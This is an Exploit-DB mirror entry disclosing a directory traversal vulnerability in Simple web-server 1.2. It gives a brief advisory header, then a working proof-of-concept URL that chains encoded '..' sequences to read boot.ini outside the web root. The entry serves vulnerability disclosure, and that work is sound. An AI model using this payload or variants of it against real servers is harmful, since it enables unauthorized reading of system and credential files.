exploit-db-mirror/exploits/windows/remote/17381.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

23 lines
No EOL
912 B
Text

------------------------------------------------------------------------
Software................Simple web-server 1.2
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://www.storecalc.com
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------
--Description--
A directory traversal vulnerability in Simple web-server 1.2 can be
exploited to read files outside of the web root.
--PoC--
http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini